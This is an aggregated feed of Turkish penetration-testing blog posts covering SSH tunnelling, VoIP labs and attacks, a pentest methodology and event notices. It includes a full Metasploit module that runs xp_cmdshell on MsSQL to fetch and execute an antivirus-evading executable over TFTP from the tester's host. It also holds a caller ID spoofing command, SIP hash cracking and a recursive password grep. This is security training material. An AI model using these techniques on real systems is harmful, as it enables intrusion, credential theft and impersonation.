Quantcast
Channel: Bilgi Güvenliği AKADEMİSİ
Viewing all 331 articles
Browse latest View live

Sızma Test Araçlarını SSH Tüneli Üzerinden Kullanmak

$
0
0
Sızma testleri yapılırken genellikle testi yaptıran firma kendisine hangi ip adresi, ip adreslerinden denemeler yapıldığını bilmek ister. Bazı durumlarda Firewall/IPS/WAF sistemlerden bu ip adreslerine özel erişimler tanımlanması da gerekebilir.

Eğer sızma test ekibi birden fazla kişiden oluşuyorsa tek bir ip adresinden çıkış yapabilmek için ofis çıkış ip adresi ya da internet üzerinden alınacak VPS sunucular kullanılabilir. VPS sunucunun Linux olması durumunda birden fazla kişi bu sunucuya bağlanarak sızma testlerini gerçekleştirebilir.

Sunucu üzerinden iki farklı şekilde sızma testleri gerçekleştirilebilir. Bunlardan biri Linux sunucu üzerine VPN kurularak tum sızma test uzmanları VPN'le bağlanıp sunucu üzerinden çıkış yaparak test gerçekleştirir.
VPN kurulumu ve yönetimi biraz daha zahmetli olduğu için diğer yöntem olan uzaktaki sunucuyu SOCKS Proxy olarak kullanma daha tercih edilebilir  ya da SSH üzerinden kolay VPN kurulumu yapabilecek sshuttle aracı kullanılabilir. Bu işlem çoğu zaman yasaklı sitelere girmek veya şirket networklerinden içerik filtreleme sistemlerini atlatma veya kablosuz ağlarda güvenli dolaşma için v.s kullanılır.

Bunun için proxy sunucumuz üzerinde ssh Port adresi 443 olarak set edildikten sonra yerel sistemde  aşağıdaki komut ile uzak sisteme ssh tünel kurulması ve yereldeki TCP/8080 portuna gelen isteklerin sunucu ip adresiyle internete çıkartılması sağlanır.

root@pentest-pc:~# ssh -D 8080 username@proxysunucu -p 443

Fakat burada localdeki 8080 portu socks proxy desteği olan araçlarda set edilip kullanılabilir. Örneğin browserlarda(ie,firefox v.s) proxy ayarından socks proxy bölümü localhost:8080 yapılarak browser üzerinden hedefe proxy üzerinden gidebiliriz. Fakat bu işlem pentest işlemlerinde bize yetmeyebilir. Yani bazı hazır otomatize tool'lar(zap,burb suite vs.) kullanmak istediğimizde karşımıza socks proxy desteğinin olmaması gibi sorunlar çıkabilir.

Bu durumda pentest yapacağımız tool'ların da kurduğumuz ssh proxy bağlantımız üzerinden geçmesini isteyebiliriz. Yani localimizin tüm trafiğini bu uzak proxy sunucuya secure olarak göndermek isteyebiliriz. Bunun için sshuttle aracı kullanılabilir.Bu araç ile proxy sunucusunun istenilen portuna ssh bağlantınızı kurabilir ve tüm internet trafiğinizin bu proxy üzerinden gitmesini sağlayabilirsiniz. Böylece zap gibi güvenlik araçlarının socks proxy desteginin olmamasından dolayı yaşanabilecek zorluklar giderilebilir.

Kurulum:
Sshuttle indirmek için https://github.com/apenwarr/sshuttle adresini ziyaret edebilirsiniz.

Sshuttle  aracının basit kullanımı aşağıdaki gibidiri.

root@pentest-pc:/sshuttle# ./sshuttle -r username@proxysunucu:sshportu 0.0.0.0/0 -vv

Sizden ilgili kullanıcıya ait parolayı isteyecek girdikten sonra tüm trafiginiz artık proxy server üzerinden geçecektir. Bundan sonra pentest için kullanılan proxy'lik de yapan ZAP/Burb suite gibi uygulamalar rahatlıkla kullanılabilir.
Örneğin ZAP kullanmak için, browser üzerinde http proxy ayarı localhost:8080 olarak girildikten sonra ilgili siteler üzerinde gezinti yapılarak ZAP aracının üzerinden trafigin geçmesi ve cache'len mesi sağlanabilir.
Celal ERDİK / Sızma Test Uzmanı

[Etkinlik] Bilgi Güvenliğinde Sızma Testlerinin Yeri ve Önemi

$
0
0
Bilişim güvenliğinin en önemli konularından biri sızma testleri olmaktadır. Kimi zaman bir zorunluluk kimi zaman güvenliğe olan gerçek ihtiyaç firmaları sızma testleri yapmaya zorlamaktadır.
NetSec Ağ ve Bilgi Güvenliği Topluluğu düzenli olarak gerçekleştirdiği etkinliklerden 5.sini gün geçtikce önemi artan bir konu olan Sızma Testleri (pentest) ne ayırmıştır. Etkinlik sızma testleri konusunda hem teknik hem de idari olarak kafalarda kalan soru işaretlerine çözüm sunmayı hedeflemektedir.

Kayıtlar ücretsizdir, etkinlik salonundaki kontenjan nedeniyle katılım için öncelik kurumsal firma çalışanlarına ayrılmıştır. (Kontenjan 100 kişiliktir.)

Etkinlik ile ilgili geri bildirimler için bilgi@netsectr.org adresine e-posta gönderebilirsiniz. 

Kayıt: Kayıtlar ücretsizdir. Ancak öncelik kurumsal firma çalışanlarınındır.

Etkinlik Tarihi: 20 Ekim 2012 Cumartesi

Kayıt İçin:http://goo.gl/lbLVS
Kayıt sayfasında hotmail, gmail, yahoo, mynet gibi kurumsal olmayan e-posta adreslerinden yapılan kayıtlar onaylanmamaktadır. Sponsor firma güvenlik kuralları gereği kayıt olmadan etkinliğe katılım sağlanamaycaktır. Katılımla ilgili onay maili etkinlikten bir hafta önce gönderilecektir.

Sponsor: Microsoft Türkiye

Taslak Program
11:00-11:15 Bilgi Güvenliğinde Sızma Testleri, Ömer ALBAYRAK, NetSec Topluluk Lideri
11:15-12:00 Neden Sızma Testleri? Nasıl Sızma Test Uzmanı(Pentester) Olunur?, Mert SARICA
12:00-12:45 Hedef Odaklı Sızma Testleri, Huzeyfe ÖNAL
12:45-14:00 Öğle Arası
14:00-14:45 Bankacılıkta Admin Riskleri ve Bellekte Avcılık, N. Şenol YILMAZ
14:45-15:00 Kahve Arası
15:00-15:45 Uygulama Güvenlik Testlerinde WAF Sistemlerini Atlatma, Mehmet D. İnce
15:45-16:00 Kahve Arası
16:00-16:45 VoIP Sistemlere Yönelik Sızma Testleri , Ozan UÇAR

Etkinlik hakkında detaylı bilgi için:  http://www.netsectr.org/2012/09/netsec-bulusmas-bilgi-guvenliginde-szma.html

VoIP Pentest Lab. Kurulumu

$
0
0
VoIP sistemler üzerine gerçekleştirilecek keşif yöntemleri, sip trafiğinin analizi, sızma girişimleri ve servis dışı bırakma saldırılarını uygulamak için aşağıdaki adımlarla voip labaratuvarı kurabilirsiniz.

Bu yazıda, pentest çalışmaları için sanallaştırma platformları kullanılarak VoIP Lab. kurulumu ve genel yapılandırması anlatılmıştır.

Not: Bu yazı temel seviyede TCP/IP ve Linux bilgisine sahip ve vmware sanallaştırma platformlarını kullanmış kişilere hitap etmektedir.

Kurulacak VoIP Sistemin Network Şeması



Ön Gereksinimler

Trixbox IP-PBX Sunucu

Centos işletim sistemi üzerine kurulu, Asterix tabanlı web arabirimine sahip IP-PBX Sunucu
http://fonality.com/trixbox/downloads

Zoiper Softphone

Voip client yazılımı, windows,linux,mac versiyonları bulunmaktadır.
http://www.zoiper.com/download_list.php

Backtrack 5 R3

Pentester makinası. VoIP cihazları test etmek ve network analizi için hali hazırda bir çok aracı barındırmaktadır.

GNS3 Lab

Cisco ios’ları sanallaştırmak için kullanılacak yazılım.


Vmware Player

İşletim sistemlerini sanallaştırmak için kullanılacak yazılım.

Trixbox Kurulumu

Trixbox .iso imajını indirdikden sonra, vmware aracılığı ile varsayılan ayarlarla kurulumu tamamlayabilirsiniz.Kurulum bittikden sonra http://ip_adresi ile web arayüzüne bağlantı kurulabilir. 

Kurulum bittikden sonra root kullanıcısı ve kurulum esnasında belirlediğiniz parola ile giriş yaparak komut satırından da yönetim yapabilirsiniz.

Network Ayarları

Kurulum sonrası ip adresi otomotik olarak DHCP’den alınacaktır. Çalışma ortamınızda bir DHCP sunucu yoksa, sabit ip adresi tanımlamak için komut satırından ‘system-config-network’ komutu çalıştırarak sabit ip adresi tanımlayabilirsiniz.



Erişim paneli varsayılan olarak User modunda açılmaktadır. Admin yetkileri ile giriş yapmak için sağ üst menüdeki User mode {switch} seçeneğine tıklanarak aşağıdaki bilgiler ile giriş yapılabilir.

Kullanıcı Adı: maint
Parola: password

VoIP Kullanıcısı Tanımlama

Yönetici seviyesinde giriş yaptıkdan sonra, PBX > PBX Settings sayfasında ‘Basic’ menüsü altında bulunan ‘Extensions’ seçeneğine tıklayarak açılan pencereden ‘Generic SIP Device’ seçiminde bulunarak kullanıcı hesaplarını tanımlayabilirsiniz.



Minimum Kullanıcı Ayarları

User Extension = Aramalarda kullanıcıya ulaşılacak numara (rakam olmalıdır)
Display Name = Aramalarada görünecek kullanıcı adı (Ad/Soyad gibi)
Secret = Tam olarak olmasada, kullanıcı parolası olarak düşünebilirsiniz.



Zoiper Kurulumu

Asterix IP-PBX sunucuya bağlanıp ses iletişimi sağlayacak istemci uygulamasıdır. Multiplatform çalışmaktadır.

Trixbox’da tanımlanan kullanıcı hesabı zoiper uygulamasına Settings ikonuna tıklayarak aşağıdaki şekilde tanımlanır.



Domain: Trixbox sunucunun ip adresi
Username: VoIP kullanıcısı tanımlarken oluşturduğunuz, UserExtension
Password: Kullanıcı tanımlarken oluşturduğunuz Secret değeri.
Caller ID Name: Arayan kişi
  
Bu aşamadan sonra, aranacak kişinin caller id numarası ekrana yazılarak arama sağlanır.

Örnek Uygulama

Ozan UCAR, Huzeyfe ONAL’ı arıyor.


Huzeyfe ÖNAL kullanıcısının, Ozan UÇAR'dan aldığı çağrı.


Buraya kadar herşey yolundaysa, kullanıcılar VoIP servisi üzerinden görüşme sağlayabilir.

VoIP sistemlerin keşfi ve saldırı teknikleri sonraki blog girdilerinde yer alacaktır.

Yazar: Ozan UÇAR / ozan.ucar@bga.com.tr

VoIP Pentest / Yerel Ağda VoIP Sistemlerin Keşfi

$
0
0
Yerel ağda bulunan voip sistemleri tespit etmek için farklı yöntemler kullanılır. Bunlardan akla ilk gelen ve en sık tercih edilenler port tarama ve user-agent değerlerine göre hedef sistemleri belirmektir.  User-agent değerlerine bakılarak IP phone, PC Softpone veya mobil aygıtlar tespit edilebilir.

Voip Sistem Keşfi

Amaç :
VOIP sistemleri tespit etmek ve bilgi toplamak
 
Kullanılacak Araçlar :
  • Smap
  • Svmap
  • Nmap
Uygulamalar :
  • Smap
Yerel ağda bulunan voip sunucu ve istemcileri tespit etmek için smap yazılımı kullanılabilir.

Smap ile tek bir hedefe yönelik veya bir ağa yönelik tarama yapılabilir.



Yukarıdaki ekran görüntüsünde, 172.16.136.151 adresinde
Asterix PBX 1.6.0.26-FONCORE-r78 tespit edildi. 172.16.136.134 adresinde ise Zoiper rev.11137 uygulaması tespit edildi.

Wireshark ile gönderilen/alınan paketler ve içeriği izlenebilir.


Svmap

Svmap, Sipvision araçları içerisinde bulunan bir diğer güçlü bilgi toplama aracıdır.
Varsayılan olarak OPTIONS isteğinde bulunur.

172.16.136.130 ve 172.16.136.155 arası ip adreslerini tarayalım.





Yazar: Ozan UÇAR / ozan.ucar@bga.com.tr

VoIP Pentest / Kimlik Doğrulama Saldırıları

$
0
0
Bir voip kullanıcısı, ağa dahil olduğunda SIP sunucuya kayıt olmak için mesaj gönderir. Bu mesaj içeriğinde saldırganı ve/veya pentester’ı ilgilendiren hassas bilgiler yer almaktadır. Bu bilgiler, kullanıcı bilgileri, kimlik doğrulama bilgileri gibi gibi önemli bilgilerdir.

Aşağıda örnek bir REGISTER başlık bilgileri bulunmaktadır.




Yerel ağda trafiği izleyen bir saldırgan, bir network paket kaydedicisi (network sniffer) ile bu trafiği izleyebilir. Wireshark bu iş için kullanılacak araçlardan biridir.




REGISTER mesajının içeriğinde, voip kullanıcısının caller id, ip adresi, parola bilgisi ve SIP extensionları bulunmaktadır. VoIP kullanıcısının parolası, MD5 hash'i olarak gönderilir ve ele geçirildiği durumda parolası kırılabilir.


Sipdump

Wireshark ile elde edilen trafiği, /pentest/passwords/sipcrack dizini altına sip.cap adıyla kaydedip, aşağıdaki şekilde simdump aracı ile authentication bilgileri ayıklanır.



User 1111 bilgileri sip-auth.txt dosyasına aktarıldı. Bir parola sözlüğü ile md5 hash kırılabilir.

Sipcrack

User 1111 parolası ‘hedehodo’ olarak tespit edilmiştir. Bu bilgiler ile o kullanıcı adına aramalar yapılabilir. Yeni saldırılar gerçekleştirilebilir.

Yazar: Ozan UÇAR / ozan.ucar@bga.com.tr

Web Uygulama Güvenlik Testleri Eğitimi

$
0
0

Eğitim tanımı
Günümüz bilişim güvenliğinin en zayıf halkalarından biri web uygulamalarının güvenliğidir. Eğitim, güvenlik birim çalışanlarına sorumluluklarında olan web uygulamalarının güvenlik testlerinin hangi adımlardan oluştuğunu ve nasıl yapıldığını pratik bir şekilde göstermeyi amaçlamaktadır.

Eğitim Yerleri ve Tarihleri
BGA Ankara
19-21 Kasım 2012
İller Sok. No:4 Mebusevleri / Tandoğan / ANKARA (Gençlik Cad. Anıtkabir yanı)
BGA İstanbul
13,14,20 Ekim 2012 (Hafta sonu programı )
Sırma Perde Sokak No:17/5 Kat:2 Altunizade/Üsküdar İstanbul

Eğitim Ücreti ve Kayıt
Lütfen egitim@bga.com.tr adresine  “Web Application Pentest Eğitimi Fiyat Bilgisi ” konulu e-posta gönderiniz veya +90 216 474 00 38 nolu telefonu arayınız.
Detaylar için http://www.bga.com.tr/web-application-pentest-egitimi-ankaraistanbul/ adresini ziyaret edebilirsiniz.

[VoIP Pentest] Sahte Numaralarla Arama Yapma (Caller ID Spoofing)

$
0
0
Bu saldırı türünde amaç yetkisiz olarak farklı bir kullanıcı adına, bir hedefi arayıp meşgul etmek ve sosyal mühendislik saldırılarına zemin hazırlamak/geliştirmektir.

Saldırgan (), Huzeyfe ONAL (1112) voip kullanıcısını Omer kullanıcısı adına arıyor.
Sahte telefon numaraları kullanarak çağrı yapma amaçlı inviteflood yazılımı kullanılabilir.. Invite mesajları gönderirken, gönderici ip adreside spoof edilebilir.

Komut: ./inviteflood eth1 1112 172.16.136.134 172.16.136.134 1 -a "Omer Bey"





Saldırı başladığında, saldırgan tarafından yetkisiz olarak başlatılan çağrı kurban ekranında görünecektir.

Huzeyfe ONAL kullanıcısı (Kurban
)



Metasploit Auxiliary (sip_invite_spoof)

Metasploit yardımcı araçları içerisinde de invite mesajları gönderebilecek modül mevcuttur.




Yazar: Ozan UÇAR / ozan.ucar@bga.com.tr

Ec-Council İleri Seviye Güvenlik Eğitimleri (CAST)

$
0
0

2013 yılında aşağıdaki eğitimler BGA Ankara ve İstanbul ofislerinde verilecektir. Ön kayıtlar ve eğitimler hakkinda bilgi için egitim@bga.com.tr adresine e-posta gönderebilirsiniz.

  • Advanced Penetration Testing (APT) (CAST 611)
  • Advanced Mobile Hacking & Forensics (CAST 612)
  • Advanced Application Security (CAST 613)
  • Advanced Network Defense (CAST 614)
  • Hacking “Secure” Encryption and Countermeasures (CAST 615)
  • Advanced Metasploit Decoded (CAST 617)

Sızma Testlerinde Metodolojinin Önemi

$
0
0

 İşinin ehli bir hacker kendisine hedef olarak belirlediği sisteme sızmak için daha önce edindiği tecrübeler ışığında düzenli bir yol izler. Benzeri şekilde sızma testlerini gerçekleştiren uzmanlar da çalışmalarının doğrulanabilir, yorumlanabilir ve tekrar edilebilir olmasını sağlamak için metodoloji geliştirirler veya daha önce geliştirililen bir metodolojiyi takip ederler.

Metodoloji kullanımı bir kişilik olmayan sızma test ekipleri için hayati önem taşımaktadır ve sızma testlerinde daha önce denenmiş ve standart haline getirilmiş kurallar izlenirse daha başarılı sonuçlar elde edilir

Bu yazıda kısaca sızma testlerinde BGA olarak takip ettiğimiz  metodoloji kısa açıklama ve örneklerle anlatılmıştır.

Internet üzerinde ücretsiz olarak edinilebilecek çeşitli güvenlik testi kılavuzları bulunmaktadır.

Bunların başında ;
•    OWASP(Open Web Application Security Project)
•    OSSTMM(The Open Source Security Testing Methodology Manual)
•    ISSAF(Information Systems Security Assessment Framework)
•    NIST  SP800-115

gelmektedir. Internetten ücretsiz edinilebilecek bu test metodojileri incelenerek yapılacak güvenlik denetim testlerinin  daha sağlıklı ve tekrar edilebilir sonuçlar üretmesi  sağlanabilir.

Metodoloji hazırlanmasında dikkat edilmesi gereken en önemli hususlardan biri sızma test metodolojisinin araç tabanlı (X adımı icin Y aracı kullanılmalı gibi) olmamasına dikkat edilmesidir.

BGA Sızma Test Metolodolojisi

Sızma testlerinde ISSAF tarafından geliştirilen metodoloji temel alınmıştır.  Metodolojimiz üç ana bölümde dokuz alt bölümden oluşmaktadır.



1.1 [Bilgi Toplama]

Amaç, hedef sistem hakkında olabildiğince detaylı bilgi toplamaktır. Bu bilgiler firma hakkında olabileceği gibi firma çalışanları hakkında da  olabilir. Bunun için  internet siteleri haber gruplari e-posta listeleri , gazete haberleri vb., hedef sisteme gönderilecek çeşitli paketlerin analizi  yardımcı olacaktır.

Bilgi toplama ilk ve en önemli adımlardan biridir. Zira yapılacak test bir zaman işidir ve ne kadar sağlıklı bilgi olursa o kadar kısa sürede sistemle ilgili detay çalışmalara geçilebilir.

Bilgi toplamada aktif ve pasif olmak üzere ikiye ayrılır. Google, pipl, Shodan, LinkedIn, facebook gibi genele açık kaynaklar taranabileceği gibi hedefe özel çeşitli yazılımlar kullanılarak DNS, WEB, MAIL sistemlerine yönelik detaylı araştırmalar gerçekleştirilir.

Bu konuda en iyi örneklerden biri hedef firmada çalışanlarından birine ait e-posta ve parolasının internete sızmış parola veritabanlarından birinden bulunması ve buradan VPN yapılarak tüm ağın ele geçirilmesi senaryosudur.

Sızma testlerinde bilgi toplama adımı için  kullanılabilecek temel araçlar:
  • FOCA
  • theharvester
  • dns
  • Google arama motoru
  • Shodan arama motoru
  • E-posta listeleri, LinkedIn, Twitter ve Facebook

1.2 [Ağ Haritalama]

Amaç hedef sistemin ağ yapısının detaylı belirlenmesidir. Açık sistemler ve üzerindeki açık portlar, servisler ve servislerin hangi yazılımın hangi sürümü olduğu bilgileri, ağ girişlerinde bulunan VPN, Firewall, IPS cihazlarının belirlenmesi, sunucu sistemler çalışan işletim sistemlerinin ve versiyonlarının belirlenmesi ve tüm bu bileşenler belirlendikten sonra hedef sisteme ait ağ haritasının çıkartılması Ağ haritalama adımlarında yapılmaktadır.

Ağ haritalama bir aktif bilgi toplama yöntemidir. Ağ haritalama esnasında hedef sistemde IPS, WAF ve benzeri savunma sistemlerinin olup olmadığı da belirlenmeli ve gerçekleştirilecek sızma testleri buna göre güncellenmelidir.

Ağ Haritalama Amaçlı Kullanılan Temel Araçlar
  • Nmap, 
  • unicornscan

1.3 [Zafiyet/Zayıflık Tarama Süreci]

Bu sürecin amacı  belirlenen hedef sistemlerdeki açıklıkların ortaya çıkarılmasıdır. Bunun için sunucu servislerdeki bannerler ilk aşamada kullanılabilir. Ek olarak birden fazla zayıflık tarama aracı ile bu sistemler ayrı ayrı taranarak oluşabilecek false positive oranı düşürülmeye çalışılır.

Bu aşamada hedef sisteme zarar vermeycek taramalar gerçekleştirilir. Zayıflık tarama sonuçları mutlaka uzman gözler tarafından tekrar tekrar incelenmeli, olduğu gibi rapora yazılmamalıdır. Otomatize zafiyet tarama araçlar ön tanımlı ayarlarıyla farklı portlarda çalışan servisleri tam olarak belirleyememktedir.

Zafiyet Tarama Amaçlı Kullanılan Temel Araçlar

  • Nessus
  • Nexpose
  • Netsparker
2.1 [Penetrasyon(Sızma) Süreci]

Belirlenen açıklıklar için POC kodları/araçları belirlenerek denelemeler başlatılır. Açıklık için uygun araç yoksa ve imkan varsa ve test için yeteri kadar zaman verilmişse sıfırdan yazılır. Genellikle bu tip araçların yazımı için Python, Ruby gibi betik dilleri tercih edilir.

Bu adımda dikkat edilmesi gereken en önemli husus çalıştırılacak exploitlerden önce mutlaka yazılı onay alınması ve mümkünse lab ortamlarında önceden denenmesidir.

Sızma Sürecinde Kullanılan Temel Araçlar
  • Metasploit, Metasploit Pro
  • Core Impact, Immunity Canvas
  • Sqlmap
  • Fimap
2.2 [Erişim Elde Etme ve Hak Yükseltme]

Sızma sürecinde amaç sisteme bir şekilde giriş hakkı elde etmektir. Bu süreçten sonra sistemdeki kullanıcının haklarının arttırılması hedeflenmelidir. Linux sistemlerde çekirdek (kernel) versiyonunun incelenerek priv. escelation zafiyetlerinin belirlenmesi ve varsa kullanılarak root haklarına erişilmesi en klasik hak yükseltme adımlarından biridir.

Sistemdeki kullanıcıların ve haklarının belirlenmesi, parolasız kullanıcı hesaplarının belirlenmesi, parolaya sahip hesapların uygun araçlarla parolalarının bulunması bu adımın önemli bileşenlerindendir.

Hak Yükseltme

Amaç edinilen herhangi bir sistem hesabı ile tam yetkili bir kullanıcı moduna geçişttir.(root, administrator, system vs)

Bunun için çeşitli exploitler denenebilir.

Bu sürecin bir sonraki adıma katkısı da vardır. Bazı sistemlere sadece bazı yetkili makinelerden ulaşılabiliyor olabilir. Bunun için rhost, ssh dosyaları ve mümkünse history’den eski komutlara bakılarak nerelere ulaşılabiliyor detaylı belirlemek gerekir.


2.3 [Detaylı Araştırma]

Erişim yapılan sistemlerden şifreli kullanıcı bilgilerinin alınarak daha hızlı bir ortamda denenmesi.  Sızılan  sistemde sniffer çalıştırılabiliyorsa  ana sisteme erişim yapan diğer kullanıcı/sistem bilgilerinin elde edilmesi.
Sistemde bulunan çevresel değişkenler ve çeşitli network bilgilerinin kaydedilerek sonraki süreçlerde kullanılması.

Linux sistemlerde en temel örnek olarak grep komutu kullanılabilir.
grep parola|password|sifre|onemli_kelime -R /

3.1 [Erişimlerin Korunması]

Sisteme girildiğinin başkaları tarafından belirlenmemesi için bazı önlemlerin alınmasında fayda vardır.  Bunlar giriş loglarının silinmesi, çalıştırılan  ek proseslerin saklı olması , dışarıya erişim açılacaksa  gizli kanalların kullanılması(covert channel), backdoor, rootkit yerleştirilmesi vs.

3.2 [İzlerin silinmesi ]

Hedef sistemlere bırakılmış arka kapılar, test amaçlı scriptler, sızma testleri için eklenmiş tüm veriler not alınmalı ve test bitiminde silinmelidir.

3.3 [Raporlama]

Raporlar bir testin müşteri açısından en önemli kısmıdır.  Raporlar ne kadar açık ve detaylı/bilgilendirici olursa müşterinin riski değerlendirmesi ve açıklıkları gidermesi  de o kadar kolay olur.

Testler esnasında çıkan kritik güvenlik açıklıklarının belgelenerek sözlü olarak anında bildirilmesi test yapan takımın görevlerindendir. Bildirimin ardından açıklığın hızlıca giderilmei için çözüm önerilerinin de birlikte sunulması gerekir.

Ayrıca raporların teknik, yönetim ve özet olmak üzere üç  farklı şekilde hazırlanmasında fayda vardır.
Teknik raporda hangi uygulama/araçların kullanıldığı, testin yapıldığı tarihler ve çalışma zamanı,  bulunan açıklıkların detayları  ve açıklıkların en hızlı ve kolay yoldan giderilmesini amaçlayan tavsiyeler bulunmalıdır. 

*Yöntembilim ya da metodoloji, belirli bir alanda kullanılan bütün metodlar; geniş anlamı ile, metodların bilim ve felsefesi olarak açıklanabilir.

Siber Savaş Aracı Olarak DDoS Etkinliği Sunumları

$
0
0

TÜBİTAK Bilgem Siber Güvenlik Enstitüsü, LABRİS Teknoloji ve Bilgi Güvenliği AKADEMİSİ desteğiyle 3 Ekim 2012 tarihinde Ankara’da düzenlenenen “Siber Tehdit ve Savaş Aracı Olarak DDoS Saldırıları” etkinliğine ait sunumlara aşağıdaki bağlantılardan erişim sağlanabilir.

Etkinlikte çekilen fotoğraflar için lütfen Facebook sayfamızı ziyaret edebilirsiniz.

MsSQL Sunuculara TFTP Üzerinden Tanınmaz Zararlı Yazılım Yükleme

$
0
0
Trivial File Transfer Protocol (TFTP)  FTP' nin temel fonksiyonel şekli olarak ifade edilen ve UDP protokolü ile çalışan basit bir dosya transfer yapısıdır. Özellikle Windows sistemlerde hali hazırda kurulu olarak gelen bu protokol ile basit dosya transferleri yapmak mümkündür.

Sızma testlerinde karışımıza çıkan MsSQL default password zafiyeti ile uzak MsSQL sunucuya bağlantı gerçekleştirilerek hedef veri tabanı sistemi üzerinde komutlar çalıştırılabilmektedir. Bu konu üzerine daha önce hazırlamış olduğumuz  yazıya aşağıdaki linkten ulaşabilirsiniz.

http://blog.bga.com.tr/2012/02/mssql-uzerinden-xpcmdshell-isletim.html

Hedef işletim sistemi üzerinde bir Anti Virüs yazılımı mevcut ise metasploit yapısında bulunan mssql modülleri başarısız olacaktır. Bunun nedeni ise bilinen meterpreter payload'ının kullanılıyor olmasıdır.


Metasploit ile hali hazırda gelen mssql_payload modülü ile üzerinde Anti Virüs kurulu olan sunucuya saldırı gerçekleştirilecektir.

msf > use exploit/windows/mssql/mssql_payload



Options bilgileri atanmıştır.


Exploit komutu ile hedef sisteme zararlı yazılım saldırısı yapılmıştır. Saldırı, sistemde ki Anti Virüs nedeni ile başarısızlıkla sonuçlanmıştır.

Bu nedenden ötürü, penetration tester tarafından hazırlanan ve Anti Virüs sistemlerini atlatabilen virüslerin sisteme gönderilmesi gerekmektedir. Hedef sisteme MsSQL sorguları ile .exe dosyası gönderip ardından bu exe'yi çalıştırmak için bilinen 3 adet yöntem mevcuttur.

1 - VBS script ile ajan yazılımı hedef sisteme indirmek. Bunun için hedef üzerinde VBS script oluşturmak gerekmektedir.
2 - SMB paylaşımı ile penetration tester kendi sisteminde bir klasörü SMB paylaşımını açar, MsSQL üzerinde yapacağı xp_cmdshell sorguları ile hedef sisteme paylaşımı açtığı klasörü mount eder. Ardından bu klasör içinden ajan çalıştırılır. Bu yöntem zor ve zaman alıcı bir tekniktir.
3 - TFTP üzerinden hedef sunucuya ajan yazılımın yüklenmesi.

3. madde için geliştirdiğimiz Metasploit modül'ünü kullanarak aynı sisteme saldırı düzenlenecektir.


PATH değişkeni , hedef'e yükleyeceğiniz ajan yazılımın yerel dosya sisteminizde ki tam dizinini belirtmektedir. Metasploit modül'ü bga.exe'nin bulunduğu dizini alarak bu dizin içeriğinde ki her şeyi TFTP servisi üzerinden sunacaktır.



















Hedef sisteme meterpreter ajanı yüklenerek full yetki elde edilmiştir.
Özet olarak ;
1 - Hedef sistemde ki Anti Virüs, bilinen ajan yazılımları yakaladığı için metasploit'in mssql_payload modül'ü başarılı olamamaktadır.
2 - Anti Virüs sistemlerini aşma özelliği kazandırılmış bir exe yazılımı hedef sisteme mssql üzerinden yüklenmiştir. Bunun için TFTP servisini kullanan ve hedef üzerinde gerekli sorguları çalıştıran metasploit modül'ü geliştirilmiştir.
3 - Hedef işletim sisteminde full yetkiler elde edilmiştir.

mssql_tftp.rb dosyasını kullanmak için metasploit'in kurulu olduğu dizine gelip modules/exploits/windows/mssql/ klasörünün altına kopyalanması yeterlidir. Ardından msfconsole komutu çalıştırıldığında mssql_tftp.rb modül'ü artık kullanıma hazırdır.


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/proto/tftp'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::TFTPServer
  include Msf::Exploit::Remote::MSSQL
  #
  # This exploit affects TCP servers, so we use the TCP client mixin.
  #
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft SQL Server Malware Execution ',
      'Description'    => %q{
          Using TFTP for upload malware to target
      },
      'Author'         =>
        [
          'Mehmet Dursun Ince <mehmet.ince[at]bga.com.tr'      
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 14 $',
      'DisclosureDate' => '11 Oct 2012',
      'References'     =>
        [
          # 'sa' password in logs
          [ 'CVE', '2000-0402' ],
          [ 'OSVDB', '557' ],
          [ 'BID', '1281' ],

          # blank default 'sa' password
          [ 'CVE', '2000-1209' ],
          [ 'OSVDB', '15757' ],
          [ 'BID', '4797' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0
      ))
    register_options(
      [
        OptString.new('PATH', [ true, 'Set full location of malware.exe', '/root/Desktop/malware.exe' ]),
        OptString.new('LHOST', [ true, 'Listener Ip Address', '' ]),
        OptString.new('RPATH', [ false, 'Directory of target sistem', 'c:\\Windows\\Temp\\' ]),      
      ])    
  end

  #
  # The sample exploit just indicates that the remote host is always
  # vulnerable.
  #
  def check
    return Exploit::CheckCode::Vulnerable
  end

  #
  # The exploit method connects to the remote service and sends 1024 A's
  # followed by the fake return address and then the payload.
  #
  def exploit
    if not datastore['PATH']
      print_error("You must PATH to use this module.")
      return
    end
    #### PARSING DATA
    tftp_server_path = ""
    exe_name = ""

    exe_name = datastore['PATH'].split("/").last
    datastore['PATH'].split("/")[1..-2].each { |value| tftp_server_path += "/" + value}
    ####  
    @tftp = Rex::Proto::TFTP::Server.new
    print_status("Starting TFTP server...")

    print_status("Files will be served from #{tftp_server_path}")
    @tftp.set_tftproot(tftp_server_path+"/")
    @tftp.start
    add_socket(@tftp.sock)
 
    ### Connection MsSQL ####
   print_status("Version:")
   if (not mssql_login_datastore)
      print_status("Invalid SQL Server credentials")
      return
    end  
    command="cmd.exe /c tftp -i "+datastore['LHOST']+" GET "+exe_name+" "+datastore['RPATH']+"metasploit_b4ckd0oR.exe"
    mssql_xpcmdshell(command,true )
    print_status("Executing your malware.exe, please wait!!!")
    @tftp.stop
    mssql_xpcmdshell("cmd.exe /c " + datastore['RPATH']+"metasploit_b4ckd0oR.exe",false )
    handler
  end
end

[NOT] Bu yazıda anlatılanlar herhangi bir iş ortamında değil BGA Pentest Lab ortamında denenmiştir.

Mehmet INCE
mehmet.ince@bga.com.tr

Siber Güvenlik Konferansı / 6 Kasım 2012, Ankara

$
0
0
2012 yılında dünyaya damgası vuran ve siber dünyadan gelebilecek tehditlere karşı önemini daha çok hissettiren siber güvenlik, siber casus yetiştirme politikaları, siber savaşlar ve bu alana yönelik olarak ülkelerin bütçelerinden ayırdıkları hatırı sayılır oranlara ulaşan rakamlar, siber güvenlik kavramını bireysel, kurumsal ve ülke güvenliği açısından kritik öneme kavuşturmuştur.

Bilgi Güvenliği AKADEMİSİ tarafından TÜBİTAK BİLGEM Siber Güvenlik Enstitüsü desteğiyle düzenlenecek olan Siber Güvenlik Konferansı bu eksendeki soru ve sorunlara  çözüm önerileri sunmayı hedeflemektedir.
Yer & Tarih
